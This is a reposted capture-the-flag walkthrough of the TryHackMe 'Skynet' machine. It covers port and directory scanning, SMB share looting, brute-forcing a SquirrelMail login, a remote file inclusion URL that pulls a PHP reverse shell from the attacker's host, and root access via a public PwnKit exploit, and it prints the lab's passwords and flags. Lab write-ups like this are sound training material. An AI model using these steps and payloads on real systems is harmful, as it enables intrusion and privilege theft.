2023-5-10 02:38:25 Author: infosecwriteups.com(查看原文) 阅读量:20 收藏
A vulnerable Terminator-themed Linux machine | TryHackme Room Simple Writeup | Karthikeyan Nagaraj
Nmap:
$ nmap -sC -sV <MACHINE_IP>PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 992331bbb1e943b756944cb9e82146c5 (RSA)
| 256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_ 256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL PIPELINING UIDL CAPA RESP-CODES TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 post-login more listed have capabilities ID LITERAL+ LOGINDISABLEDA0001 IDLE LOGIN-REFERRALS OK Pre-login ENABLE SASL-IR
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| smb2-time:
| date: 2023-05-07T05:07:19
|_ start_date: N/A
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2023-05-07T00:07:19-05:00
Gobuster:
└─$ gobuster dir -u http://10.10.71.82/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.71.82/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 310] [--> http://10.10.71.82/admin/]
/ai (Status: 301) [Size: 307] [--> http://10.10.71.82/ai/]
/config (Status: 301) [Size: 311] [--> http://10.10.71.82/config/]
/squirrelmail (Status: 301) [Size: 317] [--> http://10.10.71.82/squirrelmail/]
/css (Status: 301) [Size: 308] [--> http://10.10.71.82/css/]
/js (Status: 301) [Size: 307] [--> http://10.10.71.82/js/]
===============================================================
2023/05/07 11:25:45 Finished
===============================================================
Enum4 Linux:
1. What is Miles password for his emails?
- First login to the Anonymous share with No Password
- We found a File and a Directory so Let’s the Files using
get <FileName>
- Now Let’s cd into logs and Download all Files
We Have Found a List of Passwords in log1.txt So Let's use the file of passwords to Bruteforce the login /squirrelmai using Burpsuite
- Capture the request through burp
- Send it to Intruder and use
Sniperas attack type - Move to payloads and add the password list or Copy paste it
We Found a Redirect to Webmail.php which seems to be Interesting, so copy and paste the password into the login field
Voila!! We Found the Password : )
Ans: cyborg007haloterminator2. What is the hidden directory?
- On Opening the below mail, we found a password
I Used Rapid Tables to Decrypt the Message
2. We got the password so let’s log in to /milesdyson share with the username milesdyson and Password we Found in the Mail )s{A&2Z=F^n_E.B`
We are In, Now let’s explore!!
$ smbclient //10.10.71.82/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.smb: \> ls
. D 0 Tue Sep 17 14:35:47 2019
.. D 0 Wed Sep 18 09:21:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:35:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:35:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:35:14 2019
notes D 0 Tue Sep 17 14:48:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:35:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:35:14 2019
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 14:48:40 2019
.. D 0 Tue Sep 17 14:35:47 2019
3.01 Search.md N 65601 Tue Sep 17 14:31:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:31:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 14:31:29 2019
0.00 Cover.md N 3114 Tue Sep 17 14:31:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 14:31:29 2019
====> important.txt N 117 Tue Sep 17 14:48:39 2019
6.01 pandas.md N 9221 Tue Sep 17 14:31:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:31:29 2019
2.01 Overview.md N 1165 Tue Sep 17 14:31:29 2019
3.02 Planning.md N 71657 Tue Sep 17 14:31:29 2019
1.04 Probability.md N 62712 Tue Sep 17 14:31:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 14:31:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 14:31:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 14:31:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 14:31:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 14:31:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 14:31:29 2019
6.00 Appendices.md N 20 Tue Sep 17 14:31:29 2019
1.01 Functions.md N 7627 Tue Sep 17 14:31:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 14:31:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 14:31:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 14:31:29 2019
4.00 Simulation.md N 20 Tue Sep 17 14:31:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 14:31:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 14:31:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 14:31:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 14:31:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 14:31:29 2019
5.01 Process.md N 5788 Tue Sep 17 14:31:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 14:31:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 14:31:29 2019
5.02 Visualization.md N 940 Tue Sep 17 14:31:29 2019
5.00 In Practice.md N 21 Tue Sep 17 14:31:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 14:31:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 14:31:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 14:31:29 2019
1.00 Foundations.md N 22 Tue Sep 17 14:31:29 2019
9204224 blocks of size 1024. 5819264 blocks available
We found a File Called Information.txt which the hidden Directory
Ans: /45kra24zxs28v3yd3. What is the vulnerability called when you can include a remote file for malicious purposes?
Ans: Remote File Inclusion4. What is the user flag?
Now we found the Hidden Directory so let’s try to brute-force further with Goubuster
gobuster dir -u http://<Machine-IP>/45kra24zxs28v3yd -w <Wordlist-Location>
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.223.209/45kra24zxs28v3yd
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 418]
/administrator (Status: 301) [Size: 333] [--> http://10.10.223.209/45kra24zxs28v3yd/administrator/] ===============================================================
Finished
===============================================================
On googling about this, we found a File Inclusion Vulnerability
Exploit:
For this, we can run Simple python server to upload a reverse shell
- Download the Reverse Shell file and move it to
/var/www/htmldirectory or your/homedirectory with the file name asphp_reverse_shell.phpand make sure to add your system IP and port4444inside the reverse_shell File - Now let’s start python’s http Server
3. Start a Reverse Listener using netcat with the port you used on reverse shell
4. Now Let’s execute the below Payload
http://<Machine_IP>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<Your-System-IP>/php_reverse_shell.php
We got the reverse shell, cd /home and cat user.txt
Ans: 7ce5c2109a40f958099283600a9ae8075. What is the root flag?
First let’s make the terminal Interactive using Python!
python3 -c "import pty;pty.spawn('/bin/bash')"- Download the Linpeas File on your machine and move it to
/var/www/htmlor your/homedirectory - Now let’s download the file on the target machine using wget
3. Now let’s change the file permission then Execute the File!!
Let’s download the files and move it to the target machine!!
git clone https://github.com/berdav/CVE-2021-4034
zip exploit CVE-2021-4034 -rMove the zip files to /var/home/www/ or /home then download it on the target machine using wget
cd CVE-2021-4034
make
./cve-2021–4034
cd /root
cat root.txtAns: 3f0372db24753accc7179a282cd6a949如有侵权请联系:admin#unsafe.sh